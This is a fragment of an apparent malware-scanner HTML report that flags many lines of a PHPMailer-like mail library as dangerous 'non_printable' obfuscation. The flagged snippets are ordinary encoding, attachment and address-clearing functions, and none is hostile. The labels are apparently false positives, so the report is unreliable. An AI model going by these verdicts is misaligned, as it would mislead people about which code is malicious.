</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3037</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$encoded</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3048</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$position </span><span style="color: #007700">= </span><span style="color: #DD0000">'text'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3057</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$encoded</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3059</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #DD0000">"\"</span><span style="color: #0000BB">$encoded</span><span style="color: #DD0000">\""</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3076</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$str</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3084</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'mb_strlen'</span><span style="color: #007700">) && </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">hasMultiBytes</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3085</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">which correctly encodes </span><span style="color: #007700">and </span><span style="color: #0000BB">wraps long</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3112</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">hasMultiBytes</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3114</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'mb_strlen'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3115</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">) > </span><span style="color: #0000BB">mb_strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">CharSet</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3116</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions anyway</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3126</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">has8bitChars</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3128</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'/[\x80-\xFF]/'</span><span style="color: #007700">, </span><span style="color: #0000BB">$text</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3134</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">by paravoid</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3135</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">mb</span><span style="color: #007700">-</span><span style="color: #0000BB">encode</span><span style="color: #007700">-</span><span style="color: #0000BB">mimeheader</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #FF8000">#60283</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3141</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">base64EncodeWrapMB</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$linebreak </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3181</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">quoted</span><span style="color: #007700">-</span><span style="color: #0000BB">printable</span><span style="color: #007700">-</span><span style="color: #0000BB">decode</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #FF8000">#89417 Adapted from this comment</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3183</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeQP</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">, </span><span style="color: #0000BB">$line_max </span><span style="color: #007700">= </span><span style="color: #0000BB">76</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3185</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function if </span><span style="color: #0000BB">it</span><span style="color: #DD0000">'s available (>= PHP5.3)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3186</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'quoted_printable_encode'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3187</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">quoted_printable_encode</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3195</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">preg_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">'/[^\r\n]{' </span><span style="color: #007700">. (</span><span style="color: #0000BB">$line_max </span><span style="color: #007700">- </span><span style="color: #0000BB">3</span><span style="color: #007700">) . </span><span style="color: #DD0000">'}[^=\r\n]{2}/'</span><span style="color: #007700">, </span><span style="color: #DD0000">"$0=\r\n"</span><span style="color: #007700">, </span><span style="color: #0000BB">$string</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3199</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that was removed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3208</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeQPphp</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3213</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">encodeQP</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">, </span><span style="color: #0000BB">$line_max</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3224</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeQ</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$position </span><span style="color: #007700">= </span><span style="color: #DD0000">'text'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3261</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">' '</span><span style="color: #007700">, </span><span style="color: #DD0000">'_'</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoded</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3275</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addStringAttachment</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 32</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafClear</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">,</span><span style="color: #0000BB">$email</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3314</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean True on successfully adding an attachment</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3316</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addEmbeddedImage</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$cid</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">, </span><span style="color: #0000BB">$type </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$disposition </span><span style="color: #007700">= </span><span style="color: #DD0000">'inline'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3361</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addStringEmbeddedImage</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 338</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return-</span><span style="color: #0000BB">Path</span><span style="color: #007700">) </span><span style="color: #0000BB">of the message</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3393</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">inlineImageExists</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3407</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">attachmentExists</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3421</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">alternativeExists</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3423</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return !empty(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">AltBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3432</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearQueuedAddresses</span><span style="color: #007700">(</span><span style="color: #0000BB">$kind</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3446</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3459</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearCCs</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 345</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return-</span><span style="color: #0000BB">Path of the message</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3472</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearBCCs</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3485</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearReplyTos</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 348</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return-</span><span style="color: #0000BB">path header</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3495</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearAllRecipients</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3508</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearAttachments</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3517</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearCustomHeaders</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3528</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setError</span><span style="color: #007700">(</span><span style="color: #0000BB">$msg</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 352</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">ReturnPath </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3550</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">an RFC 822 formatted date</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3555</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">rfcDate</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3560</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">date</span><span style="color: #007700">(</span><span style="color: #DD0000">'D, j M Y H:i:s O'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3565</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns </span><span style="color: #DD0000">'localhost.localdomain' </span><span style="color: #007700">if </span><span style="color: #0000BB">unknown</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3569</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">serverHostname</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3576</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'gethostname'</span><span style="color: #007700">) && </span><span style="color: #0000BB">gethostname</span><span style="color: #007700">() !== </span><span style="color: #0000BB">false</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3590</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">lang</span><span style="color: #007700">(</span><span style="color: #0000BB">$key</span><span style="color: #007700">)</span>
</span>
